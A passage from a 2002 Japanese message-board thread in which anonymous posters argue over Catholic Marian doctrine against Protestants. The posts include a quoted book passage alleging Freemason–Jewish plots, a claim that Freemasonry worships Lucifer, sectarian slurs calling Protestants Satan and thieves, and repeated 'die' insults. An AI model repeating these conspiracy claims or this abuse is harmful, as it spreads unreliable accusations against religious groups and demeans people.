日本支部というのもなじまないので。ただ日本支部の社員
というのは大人物が多いとか?(わたし発の情報なので
信用しないで欲しい。笑 だがそういう番組を確か観た)

トンデモ本か、世界を震撼させる本か・・・あなたの判断は?
http://www.geocities.co.jp/Bookend-Kenji/9728/e12.htm

607 :名無しさん@1周年:02/12/09 17:03
『ヘロデの呪いーー暴かれたユダヤ古写本』中央アート出版より

私は、棟梁のメーソン達との私的付き合いから、ロッジの内部には主に
三つのグループがある事を発見したと話した。
 カトリックを攻撃する集団、それから宗教を悉く攻撃する集団がある。
第三グループは前の二集団から成り、世俗的権力を支配下に収めると云う
目的の為に、政界で戦っている。彼女(ヨナの妻ジャネット!愛)はこの
様に話した。
「ジェームズ、貴方が新しいメーソンリー(フリーメーソン!愛)に加わ
ったのは、宗教の敵を支援する為でも、どんな宗教を支援する為でもなく、
それを研究して先祖のメーソンリー(古代イスラエルのメーソン!愛)と
比較し、この歴史を完成させる為でした。其れは、私達が初めから決めて
いた事です。
 私達は、この歴史の記録から、貴方の御先祖のレビが、デザギュリエと
共に結社の名称を変更した時に、問題が持ち上がった事を知りました。
 貴方が私に話して下さった様に、確かに、私達プロテスタントの中には
カトリックとローマ教会を滅ぼす事を目標に据えて、ユダヤ人と結託して
いるセクトもあります。其れはデザギュリエとアンダーソンが主張してい
た事です。

608 :名無しさん@1周年:02/12/09 17:03
 ですが、ジェームズ、私も私の両親も、そのようなセクトの人間ではな
いのです。確かに、私達はプロテスタントですが、ローマ・カトリック教
会を潰す意図等毛頭ありません。よく聞いてください。私達は、その教会
をお作りになったのはイエス様であると信じているのです。主は、其れは
滅びないとおっしゃいました。

 プロテスタントの中に、教皇の権威を敵視する伝統が代々受け継がれて
はいても、貴方は私達の信仰を持たなくてはなりません。
 私の両親も、私も、教会の敵と同盟を結ぶ等と云う事を、一度たりとも
考えた事はありません。私のとりなしによってクリスチャンになった貴方
も、私が両親から受け継いでいるこの信仰を受け止めなくてはなりません。
 この二つのセクト、特にカトリックを攻撃目標にする集団と、全ての宗
教を攻撃する集団に加える事には注意なさい。彼等の罠には嵌まらぬよう
気を付けて下さい。
 貴方は私に従ってクリスチャンになったのです。私を愛し、結婚してく
れたのですから、宗教に於いてはいつまでも私と信仰を固くし、約束と新
しい信仰を固く守って欲しいです。
 ですから、貴方が新メーソンリーに入社する最初の目的だった研究をど
うかやり遂げ、真実を明らかにし、悪を一掃すると云う私達の願いを全う
して下さい。

609 :名無しさん@1周年:02/12/09 17:04
 目の前に光のドアが開け放たれれば闇は消えて、人々は自然と真理の道
へ導かれるでしょう。惑わされている人も、惑わしている人も等しく導く
光が、実在の頂きから降り注ぐでしょう」
『ヘロデの呪いーー暴かれたユダヤ古写本』中央アート出版より



610 :名無しさん@1周年:02/12/09 17:06
知らない本だな。検索してみよっと

611 :名無しさん@1周年:02/12/09 17:22
旦那居ぬ間に私通して子供つくれば、贖罪者か。簡単でいいな。

612 :名無しさん@1周年:02/12/09 17:23
プロはカトリックの教皇に倣って、フリーメーソンを一掃したほうがいいな。
南部バプテストの牧師の3分の2派フリーメーソンだ。3分の1に
主は粛清されるだろうヨ。

613 :名無しさん@1周年:02/12/09 17:24
>>611バカ宗教のスレ主よ。元気だな

614 :542:02/12/09 17:36
弛レスだけど、>>547 『ローマ皇帝ハドリアヌス』という本によれば、

 ルネッサンス・ラテンにおいてカトリック教会が「聖人」に対して用いたと同じ「ディウス」(divus)という形容辞を用いて格づけされるようになった・・・
 ひとかどの人として、キリスト教の聖人たちとまったく同じ地位を皇帝たちに帰すること、それですら彼ら(皇帝たち)はあまりに高いところに位置することになる。

つまり、皇帝たちが「崇拝」されるというのは、
のちのキリスト教の聖人たちへの形容辞ディウスさえ皇帝を高めすぎだとローマ人が感じる程度の「崇拝」だった。

615 :名無しさん@1周年:02/12/09 17:49
>>614 したがって、皇帝崇拝とは、今日の感覚でいえば、
祝日の「国旗掲揚」と同程度・意味な認識だったわけだ。

これに政治的理由以外で抵抗するようなカトリックなど想像しにくいのだが。何か意見は?
日の丸については、まさに政治的な嫌悪感ぐらいしかないだろ?


歴史を理解する力が、中途半端にあるから(W

616 :名無しさん@1周年:02/12/09 18:15
>>614,15だから、何だっての?
皇帝に「陛下」と尊称をつけると、
キリストのために殉教した天国の聖人の価値が薄れるのか?
枢機卿に睨下と尊称をつけると、天国の聖人の価値が薄れるのか?
教皇に聖下と尊称をつけると、天国の聖人の価値はなくなるのか?
幼稚だな。日本語を書けよ。ぼうや。

617 :名無しさん@1周年:02/12/09 18:18
>>542>>614>>615は日本語がおかしいな。韓国人だろ。

618 :名無しさん@1周年:02/12/09 18:23
ココには、次の者たちがカキコしてる。
1、聖公会
2、カトリック
3、プロ
4、エホ証
5、フリーメーソンをた
6、ユダヤ人
7.俺さんシンパ
8、無神論者

619 :名無しさん@1周年:02/12/09 18:25
あなた方は忘れていることが1つある。マリアが大嫌いなのは、だれか。

1、蛇、サタン、悪魔である。婦人の末は蛇の頭を踏み砕く。
2、蛇、サタン、悪魔を崇拝する組織と組織員である。

蛇崇拝のカルトはグノーシスである。
サタン崇拝のカルトは悪魔教である。
悪魔崇拝カルトは悪魔教である。

だが、もうひとつある。
蛇、悪魔、サタンの本体であるルシファーだ。
ルシファー崇拝カルトはどこか。
フリーメーソンおよび、その関連秘密結社である!


620 :名無しさん@1周年:02/12/09 18:26
ココには、次の者たちがカキコしてる。
1、聖公会
2、カトリック
3、プロ
4、エホ証
5、フリーメーソンをた
6、ユダヤ人
7.俺さんシンパ
8、無神論者
9、韓国系ペンテコ派

621 :名無しさん@1周年:02/12/09 18:28
ルターとカルヴァンはマリアを崇敬してました。プロは見習いましょう。

A,マルチン・ルター
1、神の母
「マリアは正しく、人の母であるばかりか、神の母とも呼ばれる。
マリアがまことの神のおん母であることは確かである。」(Martin Luther,
Weimar edition of Martin Luther's Works, volume 24, 107.)

2、終生童貞
「マリアが主の御母でありかつ処女であるというのは信仰箇条である」
(Martin Luther, op. cit., Volume 11, 319-320.)

622 :名無しさん@1周年:02/12/09 18:30
3、無原罪の宿り
「マリアの霊魂の受胎が原罪なく行われたというのは、甘美なる、
敬虔なる信仰である。すなわち、霊魂の受胎そのものにおいて、
マリアもまた原罪を免れ、神の賜物に満たされ、神によって受胎する
純なる霊魂を受け、こうして、生の最初の瞬間から、すべての罪を
拭われていたという信仰である。」
("On the Day of the Conception of the Mother of God," 1527).

4、被昇天
「処女マリアが天国におられることは疑い得ない。それがどのようにして
起こったのかは、私たちにはわからない。」(Martin Luther, Weimar
edition of Martin Luther's Works Trans.by William J. Cole 10, p. 268.)

5、マリア崇敬
「マリア崇敬は人間の心の奥底に記されている」(Martin Luther, Weimar
edition of Martin Luther's Works 10, III, p.313.)

「キリストのみがたたえられるのでしょうか?神の聖母もたたえられる
べきではないでしょうか?この方は蛇の頭を踏み砕いた婦人。どうか、
私たちに耳を傾けてくだい。御子はあなたの願いを拒まないからです」
(1546年1月、ウィッテンベルクにおける最後の説教。Martin Luther,
Weimar edition of Martin Luther's Works, Volume 51, 128-129.)

623 :名無しさん@1周年:02/12/09 18:31
性格にはグノーシスの一派が蛇崇拝。
バイ荒井献『トマス福音書』

624 :名無しさん@1周年:02/12/09 18:32
B.カルヴァン
「エリサベツはマリアを「主のおん母」と呼んだ。マリアに受胎する
肉なる人が、同時に永遠の神であると彼女がいえるほど、
その人性はキリストの2性質に融和していたからである。」
(John Calvin, Calvini Opera [Braunshweig-Berlin, 1863-1900], Vol45, 35.)

「マリアに何人も子供がいたという、ヘルビディウスは、無知過ぎる。
幾つかの箇所で、それはキリストの従兄弟であると示されている
からである。」(Bernard Leeming, "Protestants and Our Lady", Marian
Library Studies, January 1967, p.9. )

「御子の母に選ばれ、運命付けられることによって、神がマリアに最高の
栄誉を授けられたことは否定できない。」( John Calvin, Calvini Opera
[Braunshweig-Berlin, 1863-1900], Volume 45, 348.)

「御子の母とならせたもうことにおいて、神がマリアに崇敬と誉れを
お与えになったことに思いを馳せずして、キリストにある祝福を楽しむ
ことはできない」(John Calvin, A Harmony of Matthew, Mark and
Luke (St. Andrew's Press, Edinburgh, 1972), p.32.)

625 :名無しさん@1周年:02/12/09 18:34

ツウィングリ
「私は、神のおん母、永遠に純潔なる、原罪なき童貞マリアを篤く敬う。
キリストはいとも清き童貞からお生まれになった」
(Stakemeier, E. in De Mariologia et Oecumenismo, Balic, K., ed.,
Rome, 1962, p. 456.)

ジョン・ウェスレー
「私は信じる…イエス・キリストが祝されし童貞からお生まれになった
ことを。マリアが、主をおうみになってからも、純潔かつ、染みなき
童貞であり続けたことを」
("Letter to a Roman Catholic," quoted in A. C. Coulter, John Wesley,
New York: Oxford University Press, 1964, 495}

626 :名無しさん@1周年:02/12/09 18:37
プロは全員カトリックになりなさい。

627 :YOSHIKI:02/12/09 18:41
★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★

おい、お前ら!
■永遠の命■は欲しくないか。
詳しくはこのHPに書いてあるぜ。
http://www12.brinkster.com/uhikaru/a&w.htm

おれのスレにいろいろ書けよ。
http://tv3.2ch.net/test/read.cgi/musicnews/1038739531/l50

おしんもよろしくな。
http://music.2ch.net/test/read.cgi/classical/1037874647/l50

★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★ ★

628 :396:02/12/09 19:26
>>404 :名無しさん@1周年 :02/12/08 20:22
>>矛盾??
>思考の型がキリストに倣うようになること、これの意味がわからないんだね。
大変遅レスでスマソだけど。「師のようになる」ことをあなたがどう解釈するかは全く触れてないのですが。
私が矛盾と言ったのは、むしろあなたの見解を否定すれば聖書が矛盾することになるといったんですがね。
こちらとしては、聖使徒パウロの目が開かれ、さらに師のキリストのようになれたということさえ言えればそれでいいんですけど。
師のキリストのようになる、またその過程の「修行」が、具体的に何を意味するかは、
そちらで自由に考えていただければ結構です。

因みに例の箇所 コロサイ 1:24 の前を読んで見てください。キリストの贖いのことをなんと書いてあるでしょうか。
コロサイ 1:22 神は御子の肉の体において、その死によってあなたがたと和解し、
と言っていますね。贖いとは神と人との和解のためにあるのです。
聖使徒パウロは2コリント 5:20で、「キリストに代わってお願いします。」 の後何といっているでしょうか。
「神と和解させていただきなさい。」と言っています。このようなことが言えるのは、
聖使徒パウロも、キリストの体である教会に身を置き、キリストと共に苦しみ、
贖いである神と人との和解に働いたということにならないでしょうか。

629 :シスター・ブリージ:02/12/09 20:43
1、共同贖罪とは:「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、身をもって、キリストの苦しみの欠けた
ところを満たすこと」(聖パウロ・コロサイ1:24)

2、マリアは聖シメオンより預言されました。「剣があなたの心臓をも
刺し貫くでしょう。多くの人の心の思いが現れるため」(ルカ2:35)

マリアは、剣で心臓がえぐられるほどの苦しみを味わったのですよ。
何の苦しみですか? 34節に書かれています。

「イスラエルの多くの者が倒れ、また立ち上がるため、反対を受ける」
御子の苦しみです。イスラエルの多くの者とはキリスト者です。

3、結論。マリアはイエスの苦しみを共にする共同贖罪者です。
共贖者マリア(キリストと共に苦しむマリア)

630 :名無しさん@1周年:02/12/09 20:43
マリアの教義1―『神の母』。431年エペソ公会議で宣言。

聖書: ルカ1:43「私の主の母が私のもとに来られるとは」

旧約の民にとって、「私の主(アドナイ)」とは誰でしょう。
創世記15:2「私の主(アドナイ)、神よ」

新約の民にとって「私の主」(キュリオス:アドナイのギリシャ語訳)
とは誰でしょう。

Tコリ12:3「イエスは主(キュリオス)である」

マリアはまことに神の母です。

631 :名無しさん@1周年:02/12/09 20:44
マリアの教義第2.「終生童貞」649年ラテラノ公会議で宣言。

聖書の証拠:

A: マリアはみごもる前も後も処女。

イザヤ書7:14「見よ、処女がみごもっている」
マタイ1:23「見よ、処女がみごもっている」
ルカ1:26、7「処女のところにきた。この処女は。」

マタイ1:23、ルカ1:26、7の「処女」の原語は未婚の女性を
意味する「アルマー」ではなく「処女」を意味するパルテノスです。

プロの方に質問します。
「処女がみごもりますか?。処女でなくなってみごもるのでは
ありませんか?にもかかわらず、みごもっている乙女に対して、
なぜ神は『処女』と言われたのでしょうか?」

妊娠してからも処女だったからです。これを認めない者は聖書の
神の啓示を否定しなさい。

632 :シスター・ブリージ:02/12/09 20:45
B、

マタイ1:25:そして、子どもが生まれる「まで」彼女を知ることがなく、
その子どもの名をイエスとつけた。

「まで」のギリシャ語(heos)は「まで、以前」を意味する語であり、
「以後」の出来事を暗示する語ではありません。

2サムエル6:23「ミカヤは死ぬまで子供を持たなかった」
死後に子供をもったという意味でしょうか?

マタイ1:25までは、イエス誕生までヨセフが関係しなかったことを
はっきり証言するために書かれたものです。それを、キリスト降誕後に
マリアがヨセフと性的交渉を持った、と悪意ある解釈をするのは、虚偽
であり、サタンのすることです。

633 :シスター・ブリージ:02/12/09 20:45
C:ギリシャ語の兄弟姉妹(アデルフォス、アデルフィ)は親戚縁者の意味。

マルコ6:3 この人は大工ではありませんか。マリヤの子で、
ヤコブ、ヨセ、ユダ、シモンの兄弟ではありませんか。その妹たちも、
私たちとここに住んでいるではありませんか。」

兄弟ヤコブ、ヨセ、ユダ、シモンは「クレオファのマリア」の子供です!
マルコ3:18、15:40、マタイ27:56、使徒1:13

634 :名無しさん@1周年:02/12/09 21:54
プロテスタントは
異端と勇敢に戦って教会を守った教父たちを
省みた方がいいな。
自分たちが異端にならない為にも…


635 :名無しさん@1周年:02/12/09 21:56
プロが聖伝を嫌うのは異端だからじゃない?



636 :名無しさん@1周年:02/12/09 21:58
カトリックが聖伝を捨てたらプロだ

637 :名無しさん@1周年:02/12/09 22:00

カトリックが聖伝を捨てたら異端ですよ。

638 :シスター・ブリージ:02/12/09 22:26
マリアの教義3 無原罪懐胎(1854年)
聖書:
「マタイ7:16あなたがたは、実によって彼らを見分けることができます。
ぶどうは、いばらからは取れないし、いちじくは、あざみから取れるわけ
がないでしょう。
7:17 同様に、良い木はみな良い実を結ぶが、悪い木は悪い実を結びます。
7:18 良い木が悪い実をならせることはできないし、また、悪い木が良い実
をならせることもできません。」

原罪なき者を宿せるのは原罪なき者です。マリアには原罪はありません。

639 :シスター・ブリージ:02/12/09 22:28
マリアの教義4 被昇天(1950年)

創世記2:17「しかし善悪の知識の木から取って食べてはならない。
それを取って食べるその時、あなたは必ず死ぬ。」
ローマ人への手紙「5:12 そういうわけで、ちょうどひとりの人に
よって罪が世界にはいり、罪によって死がはいり、こうして死が
全人類に広がった」

マリアに原罪がなかったことは教父もカトリックも宗教改革指導者も
認めています。聖書によれば、原罪の代償が死です。無原罪のマリアは
死をくぐることはありません。エノクやエリヤのように被昇天をした有
力な証拠です。プロは認めなければなりません。もし、これを認めない
なら、マリアに原罪があったことを認めなさい。しかし、ルターも、ツ
ウィングリも、ウェスレーも、カルヴァンも、マリアは無原罪であった
と証していますから、あなた方はプロではなくなります。異端者です。

640 :名無しさん@1周年:02/12/09 22:32

凄いね。
聖書からマリヤの教理をすべて論証できるとは。
驚きました。

641 :名無しさん@1周年:02/12/09 22:33
ここまで論破されたら、俺さんは、もう自殺するしかないな。w

642 :シスター・ブリージ:02/12/09 22:41
マリアの教義5、共同贖罪

共同贖罪の定義:
「あなたがたのために受ける苦しみを喜びとし・・・
キリストのからだのために、身をもって、キリストの苦しみの欠けた
ところを満たすこと」(聖パウロ・コロサイ1:24)

マリアは聖シメオンより預言されました。「剣があなたの心臓をも
刺し貫くでしょう。多くの人の心の思いが現れるため」(ルカ2:35)

マリアは、剣で心臓がえぐられるほどの苦しみを味わいました。
何の苦しみですか? 34節に書かれています。
「イスラエルの多くの者が倒れ、また立ち上がるため、反対を受ける」
御子の苦しみです。イスラエルの多くの者とはキリスト者です。
マリアはイエスの苦しみを共にする共同贖罪者です。

643 :名無しさん@1周年:02/12/09 22:44
>>シスターブリージさん

完璧ですね。ありがとうございます。

644 :名無しさん@1周年:02/12/09 22:46
>>1が異端つうことで決定ね!



645 :名無しさん@1周年:02/12/09 22:48
俺さん死んでチョ!

646 :シスター・ブリージ:02/12/09 22:53
すべて論破しましたので、このスレッドはいただきます。
メジュゴリエの聖母のメッセージを宣教するために
今後は使用させていただきます。よろしいですね?>>1

647 ::02/12/09 22:55

死ね

648 :名無しさん@1周年:02/12/09 23:01
結局、>>1はキリスト教を標榜する反キリスト教徒だったわけか。ただのなりすましか。w

649 :名無しさん@1周年:02/12/09 23:04
1はただのアフォでした。

650 :名無しさん@1周年:02/12/09 23:04
間抜けなヤロウだ

651 :名無しさん@1周年:02/12/09 23:05
石工だろうよ

652 :聖母マリアの共贖とは:02/12/09 23:30
聖母マリアの共贖とは

聖母マリアは受胎告知からはじまって、十字架の死に至るまで贖い主に対して、
マリアがはしためとしての従順は、人知を超えた献身的愛であった。贖い主の
協力者として公に表された聖書の最初の働きは、母親の権利を行使して、救い主
の誕生後40日目に、律法に従って天父に御子を捧げる犠牲の業を行われた。
その時、預言者シメオンが現れて、母親のマリアに対して、共贖者の秘義を示す
言葉を言われた。

「ご覧なさい。この子はイスラエルの多くの人を倒したり、立ち上がらせたりす
るためにと定められています。あなた自身も剣で心を刺し貫かれます。」
(ルカ2・34)

秋田の聖母像の涙は101回をもって終わりになるが、それは1981年9月
15日、午後2時頃のできごとであった。この日の目撃者は65名で、聖母の
悲しみの記念日ということで、一同深い感銘をうけた、とある。わたしも目撃者
一同もこれが最後の涙となることは露知らずにいた。

653 :聖母マリアの共贖とは:02/12/09 23:30

その日から13日目の9月28日に、姉妹一同の聖体礼拝の念祷に入ったとき、
姉妹アグネス笹川が天使の訪れを霊的に感じ、彼女の前に光に包まれた立派な美
しい聖書が現れ、創世記3章15節の数字が認められた。天使の声があり、聖母
像の涙はこの聖書の箇所に深い関係があると前置きして、続いて

「お涙が流されたこの101回の数字に深い意味がある。1人の女によって罪が
この世に入ってきたように、1人の女によって救いの恵みがこの世に入ってきた
ことをかたどるものである。数字の1と1の間に0があり、その0は永遠から
永遠にわたって存在する神を意味します。はじめの1はエワを表し、終わりの1
は聖母マリアを表わすものです。創世記3章15節を読むように指図して、同時
に天使の声も聖書も消えてしまった」とあります。

654 :聖母マリアの共贖とは:02/12/09 23:31
人びとの一般の考え方によれば、現代の世相の罪の深さを反映し、悪しき事柄
に関係づけて聖母の涙を解釈しようとしている。それは罪を防止する勧告の涙
であるが、それは単なる人間的考えにすぎない。天使の言葉によって、はじめて
聖母の涙の意味が解説されたのである。それが共贖の苦しみの涙、神の母として
の涙であった。

御子イエズス・キリストが十字架にかけられて、人類の罪を贖う姿を眺めて、
神の子の母がそれに賛成し、母親の権利の立場に立って、御子の贖罪に全く同意
して、神なる三位一体の御父に、御子のペルソナと共に同時に献げるのであった。
その心痛のあまり、肉体の目から涙を流して耐え忍んだのである。凡そ2千年前
の出来ごとの再現に外ならない。

この私的啓示はベルナデッタ少女が、マッサピールの洞窟で無原罪の宿りの
聖母の美しい姿を見たことに比敵します。聖母の涙は至る処に流されていると、
今日もきくが聖書をもって説明されたものは1つもない。秋田の101回の涙は
聖書の言葉にうらづけられ、共贖の教義に結びつく預言として天啓的であり、
超自然性を無視することができない。

655 :名無しさん@1周年:02/12/09 23:31
1さんは悪霊とは何か?を良く知らないのでしょう。
自分の姿は自分が一番知らないものですから。

656 :聖母マリアの共贖とは:02/12/09 23:32
聖パウロの新しいアダムについて、キリスト論的神学がロマ書にのべられている
が、聖母マリアの共贖性についても暗示していると考えられる。

「1人の人によって罪が世に入り、罪によって死が入り込んだように、死
はすべての人に及んだのです」(ロマ5・12)

この言葉に続いて「恵みの賜物は罪とは比較になりません。一人の罪に
よって、多くの人が死ぬことになったとすれば、なおさら神の恵みと賜物
とは、多くの人に豊かに注がれるのです。この賜物は、罪を犯した一人に
よってもたらされたようなものではありません」(ロマ5・15−16)



657 :聖母マリアの共贖とは:02/12/09 23:32
新しいアダム、キリストについてかくの如き真理が聖書にのべられているとすれ
ば、新しいエワ、聖なる神の母についてのべられても当然なことです。アダムの
罪が最初のエワの罪に結びつけられていることは疑う余地がない。贖い主である
キリストの救いの恵みが、新しいエワ、無原罪の宿りなる聖なるマリアに結びつ
けられて、この世に入ってきたことは明白である。

姉妹アグネス笹川の天使のメッセージを聖パウロの贖い主キリストの言葉に置き
かえて見ましょう。「1人の女によって罪がこの世にきたように、1人の女に
よって救いの恵みがこの世に入ってきたことを意味する」ということになる。

聖パウロは新しいアダム、贖い主であるキリストと古いアダム、罪の人を比較
しているが、アグネス笹川の天使のメッセージは罪の原因となった古きエワと
救いの恵みをこの世にもたらした新しいエワ、聖母マリアが比較対照になって、
啓示されている。それは101回の涙がこの真理をつくものである。
http://www.bishop-jp.com/akita3.html

658 :聖母マリアの共贖とは:02/12/09 23:44
主イエズス キリスト 御父の御子よ
あなたの霊を今 全地の上に遣わして下さい。
すべての民が堕落、災害、戦争から守られるよう
すべての民の心に聖霊を住まわせて下さい。
かつてマリアであられたすべての民の御母が
私たちの執りなし手でありますように。アーメン

1945年から1959年にかけて、聖母マリアは、アムステルダムのイーダ・
ペアデマンという名の婦人にメッセージを与えられました。その中で
聖母は、今、

「私たちの時代である、まさにこの時代」において『すべての民の婦人』
あるいは『すべての民の母』と呼ばれる」ことを望まれています。
1996年5月31日


659 :聖母マリアの共贖とは:02/12/09 23:45

聖母マリアをこの称号のもとに公に敬うことが、オランダのハーレム
の二人の司教によって公式に許可されました。メッセージの中で聖母は、
御自身の『共贖者、仲介者、執りなし手』としての使命が公認される
ことを望まれ、「それがかなえられれば、すべての民の婦人は世界に
平和を、まことの平和を与えることができます」と約束されました。

聖母マリアは、御子と全ての苦しみを共にされ、十字架の前に立たれて
います。そのお姿で、聖母は上記の祈りをイーダに口述されたのです。
聖母の開かれた御手からは、すべての民にとって『恵み、贖罪、平和』
を意味する三本の光が発せられています。


660 :聖母マリアの共贖とは:02/12/09 23:45

毎日十字架の前で、又はこの御絵の前で、上記の祈りを唱えるすべて
の人に、キリストの十字架に由来するこの三つの賜物を与えることを
聖母は約束されています。『かつてマリアであられた』という意味に
ついて、聖母が自らこう説明されています。

「マリアは、マリアとして多くの人に知られてきました。しかし私は今
この明けつつある新しい時代において、すべての民の婦人であることを
望むのです」1951.7.2
http://www.aba.ne.jp/~mikami/vrouwe.htm

661 :聖母マリアの共贖とは:02/12/09 23:51
聖母の共贖を勉強されたい方はここを開いてね。


http://homepage2.nifty.com/gloria/

662 :聖母マリアの共贖とは:02/12/09 23:55
このスレッドを使いきりましたら、
次は俺さんの残りのスレッドを使いきります。
どんどん使って、全部消滅させますわ。
新スレッドをたてても、宣教に使いまくりますので、よろしく。
あなた方が反論できないので、すれを放棄したと見なします。
>1

663 :名無しさん@1周年:02/12/10 00:05
やれやれ・・・カトスレを壊して
今度は俺氏のスレを壊す気か?やれやれ...


664 :名無しさん@1周年:02/12/10 00:09
自作自演スレッドだよ。ここはね・・・

665 :名無しさん@1周年:02/12/10 00:09
>>664
おまえがシスター・ブリージ_?

666 :名無しさん@1周年:02/12/10 00:12
>>664>自作自演スレッドだよ。ここはね・・・


と書いても、マリあは悪魔になんか、ならネーヨ。

667 :名無しさん@1周年:02/12/10 00:14
俺氏は死んだな。2度と立ち上がることはできないだろうな。

668 :名無しさん@1周年:02/12/10 00:15


周囲が全く見えなくなるほどに、教えに心奪われ埋没し他を破
壊してしまうという事がカルトなのだと言うこと、このスレを
見てよく分かりました。


メジュゴリエ、聖霊派、オランダ、奇跡、終末、などの言葉に
は気をつけるようにします。

669 :プロですが...:02/12/10 00:18
横レススマソ
エーとですね。私はペンテコステ派ですが、私の先生は、聖書にかかれてることは、懐中電灯で光をともした範囲内であると説明してくれましたです。残りの部分が見えないからといって、ないことにはならないと。。。残りの部分が聖伝なんでしょうね。しいていうと。

670 :名無しさん@1周年:02/12/10 00:20
>>668>>周囲が全く見えなくなるほどに、教えに心奪われ埋没し他を破
>>壊してしまうという事がカルトなのだと言うこと、このスレを
>>見てよく分かりました。
>>メジュゴリエ、聖霊派、オランダ、奇跡、終末、などの言葉に
>>は気をつけるようにします。


とかいたって、メジュの聖母は悪魔になんか、なんネーヨ。

出直してこい!

671 :名無しさん@1周年:02/12/10 00:23
>>669

???聖伝はめにみえるけど・・

672 :名無しさん@1周年:02/12/10 00:25


>>668
俺さん、
ウザイよ

673 :名無しさん@1周年:02/12/10 00:27
>668
オランダは公認されましたが、何か?

674 :名無しさん@1周年:02/12/10 00:32
>>669俺さんのクソスレがなくなることはいいことだろ?
違うのケ?

675 :名無しさん@1周年:02/12/10 00:37
んだんだ ワラ

676 :名無しさん@1周年:02/12/10 00:40
来年の6月に、満ちの惑星が地球にぶつかるそうだ。情報を求む。

677 :sage:02/12/10 02:03
>>676
LP氏ね

678 :名無しさん@1周年:02/12/10 10:12
ケキョーク、メジュ酸性派の勝利ということで、お開きツーことで

679 :名無しさん@1周年:02/12/10 10:16
新求道共同体も
公認されましたが

680 :午前の散歩:02/12/10 10:21
昨日、どういうHNで書いたか忘れたので、改めて。

結局、カトリックの教理から見た部分では正しいのだけど、
プロテスタントの一部からみた部分では間違いなんです。
でもそれは、大きな違いのようで、実はそうではない。
肝心の部分は、一致しているからです。

ただし、これだけは言っておきます。
カトリックの人たちが言っていることは、日本の道路交通法で韓国の交通を規制しようとしているようなものだと思います。
あるいは、ラグビーのルールでサッカーを評論しているようなもの。
ただし、両者とも、交通が円滑に事故もなく運ばれるように、
スポーツが事故なく公平に運ばれるようにという目的は、一致しています。

仲良くしましょう♪

681 :名無しさん@1周年:02/12/10 10:26
>>680
うまく逃げたな。w
主婦に論破されて恥ずかしくないのか?

682 :午前の散歩:02/12/10 10:27
>>681
主婦って誰?
あたしゃ、「主婦」とこのスレで話したことはないけど?
論破された経験もないけど?

683 :名無しさん@1周年:02/12/10 10:29
結局、プロテスタントの1部の教理から見た部分では正しいのだけど、
カトリックからみた部分では全部間違いなんです。
でもそれは、大きな違いのようで、実はそうなのです。
肝心の部分は、一致していないからです。

ただし、これだけは言っておきます。
プロテスタントの1部の人たちが言っていることは、日本の道路交通法で
世界の交通を規制しようとしているようなものだと思います。
あるいは、ラグビーのルールでスポーツ全部を評論しているようなもの。
ただし、両者とも、交通が円滑に事故もなく運ばれるように、
スポーツが事故なく公平に運ばれるようにという目的は、一致しています。

仲良くしましょう♪

684 :名無しさん@1周年:02/12/10 10:32
>>682だから、シスターブリーフがカキコしたことだよ

685 :名無しさん@1周年:02/12/10 10:36
>>682
キリストの使徒と同時代に生きた教父たちの聖書解釈を
全部無視して、自分たちの新解釈に差し替えるなんざ、
泥棒のやることだよ。


686 :名無しさん@1周年:02/12/10 10:37
>>680キリストの使徒と同時代に生きた教父たちの聖書解釈を全部無視して、自分たちの新解釈に差し替えるなんざ、泥棒のやることだよ。

687 :午前の散歩:02/12/10 10:44
>>682
主婦ですか?知らなかったな。いずれにせよ、論破されてはいませんよ。
「仲良くしましょう」は、どのスレでも最後に私が言っていることですしね。

>>683
肝心の部分が一致していないとは?
そもそも、あなたが考える肝心の部分とは?

>>686
使徒教父の名前を具体的に挙げて、どのような釈義をしたかを教えてください。

688 :名無しさん@1周年:02/12/10 10:47
>>プロの諸君へ

キリストの使徒と同時代に生き、勇敢に異端と戦い、
命を捨ててまで教会を守り抜き、
後の世代へ引き継いでくれた教父たちの聖書解釈を
全部無視して、自分たちの新解釈に差し替えるなんざ、
泥棒のやることだよ。恥知らず。
お前達の先駆者のほうがよほど使徒に近かったよ。
今はどうだ?先駆者の言葉さえ無視して、
母教会を執拗に陥れようとしている。
どういう積もりなんだ?
人でなしの集団よ!懺悔しろ!

689 :名無しさん@1周年:02/12/10 10:48
>>687

口先ばかり達者な恩知らずよ。懺悔しろ!




690 :マルタ ◆JKiO8VJvj2 :02/12/10 10:53
>>680
ホント、仲良くしたいですね。
ですから、こんな糞スレ立てないでほしい。
俺さんもそろそろホント氏んでほしいです。
彼こそ、日本の道路交通法で韓国の交通を規制しようとする張本人だと思います。

691 :名無しさん@1周年:02/12/10 10:57
>687使徒教父の名前を

イレナエオスなどはヨハネの同僚だった。


692 :午前の散歩:02/12/10 11:03
ヲイラ、そろそろ行かないとならないので、これだけ。

基本の部分で一致しているとは、
聖なる三位一体の神を信じ、キリストの受肉と十字架の贖罪、
そして復活と昇天、さらに再臨を信じている、ということです。

では、カトリックの皆さんの上にも、プロテスタントの皆さんの上にも、等しく、
主の平安が共に♪

693 :名無しさん@1周年:02/12/10 11:04
>>690
あんたシスター・ブリージだろ
あんたが1番不和起こしてんだろうが。
メジュキチは氏ね。


694 :名無しさん@1周年:02/12/10 11:11
>>692また逃げるの?イレナエオスよんどいてよ。
聖イレナエオス(130-202)は、その有名な著作『異端に対抗』(180)
の中で、マリアについて述べました。
「マリアは従順で、自分と、そして人類すべての救いの元とされ、
こうしてエヴァの不従順のもつれはマリアの従順によって解かれた。
処女エバが不信仰の中で縛ったものを、処女まりあは信仰を通して
ほどいた。」

695 :真昼の散歩:02/12/10 11:13
>>694ヨハネの同僚という辞典でアウト

696 :名無しさん@1周年:02/12/10 11:21
>>695
バカかおまえ?

697 :名無しさん@1周年:02/12/10 11:25
プロは泥棒と言うことで、決定ですね。


698 :名無しさん@1周年:02/12/10 11:29
イエス・キリストは言われた。「サタンは最初から泥棒でした。」

プロはサタンです。

英語のプロテスタントとは「反対する者」。
ギリシャ語のサタンとは「反対する者」。


699 :マルタ ◆JKiO8VJvj2 :02/12/10 11:31
>>693
私はシスター・ブリージではないですよ。
あなたこそ、そんなこと言って誤魔化さないで、
カトリックと和解しなさい。

700 :名無しさん@1周年:02/12/10 11:33
シスター・ブリージもマルタも全部ひとり2役。
ばれてるさ。誤魔化すな。

701 :マルタ ◆JKiO8VJvj2 :02/12/10 11:41
>>700
シスター・ブリージにさんざん論破されたからって、
